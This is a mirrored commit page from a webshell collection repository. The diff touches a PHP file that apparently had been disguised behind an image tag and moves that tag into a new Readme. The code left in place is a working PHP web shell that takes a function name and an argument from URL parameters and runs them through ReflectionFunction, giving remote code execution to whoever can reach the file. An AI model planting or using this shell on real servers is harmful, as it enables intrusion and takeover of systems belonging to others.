mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
updaet p2j php reflection php shell
This commit is contained in:
parent
a1436ab3e4
commit
3e85c60510
2 changed files with 3 additions and 3 deletions
|
@ -1,7 +1,4 @@
|
|||
|
||||
|
||||
<img src="11.jpg" alt="alt text" title="Title" />
|
||||
|
||||
<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c]));
|
3
php/p2j/Readme.md
Normal file
3
php/p2j/Readme.md
Normal file
|
@ -0,0 +1,3 @@
|
|||
|
||||
|
||||
<img src="11.jpg" alt="alt text" title="Title" />
|
Loading…
Reference in a new issue